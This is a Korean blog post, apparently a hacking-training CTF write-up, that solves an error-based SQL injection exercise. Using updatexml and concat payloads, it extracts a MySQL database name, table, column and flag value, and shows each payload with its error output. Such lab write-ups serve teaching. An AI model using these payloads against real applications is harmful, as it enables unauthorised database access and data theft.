1. 우선 sql injection을 확인하기 위해 id에 이상한 sql문 삽입
mario' dfdfasdf
=> 에러 발생 및 출력
Could not update data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'osadsdf'' at line 1
password에서는 에러가 발생하지 않음
->select ? form ?? where ???='@@@'
2. db명 : sqli_2
mario' and updatexml(null, concat(0x3a, (select 'test')), null) and 1='1
->Could not update data: XPATH syntax error: ':test'
mario' and updatexml(null, concat(0x3a, (SQL)), null) and 1='1
SQL = database()
mario' and updatexml(null, concat(0x3a, (database())), null) and 1='1
->Could not update data: XPATH syntax error: ':sqli_2
3. 테이블명 : flag_table
SQL = select table_name from information_schema.tables where table_schema='sqli_2' limit 1,1
mario' and updatexml(null, concat(0x3a, (select table_name from information_schema.tables where table_schema='sqli_2' limit 0,1)), null) and 1='1
->Could not update data: XPATH syntax error: ':flag_table'
->Could not update data: XPATH syntax error: ':membe
4. 컬럼명 : flag
SQL = select column_name from information_schema.columns where table_name='flag_table' limit 0,1
mario' and updatexml(null, concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 0,1)), null) and 1='1
-> Could not update data: XPATH syntax error: ':flag'
5. 데이터 추출
SQL = select flag from flag_tabel limit 0,1
mario' and updatexml(null, concat(0x3a, (select flag from flag_table limit 0,1)), null) and 1='1
->flag
'Nomaltic's Hacking Traning!!' 카테고리의 다른 글
| DB데이터 추출 1,2,3 문제 풀이정리 (0) | 2023.05.02 |
|---|---|
| DB 데이터 추출 3_blind sqli 이진탐색 (0) | 2023.05.01 |
| db 데이터 추출 1 (0) | 2023.04.26 |
| Login Bypass 4 (1) | 2023.04.19 |
| Login Bypass 3-1 (0) | 2023.04.19 |
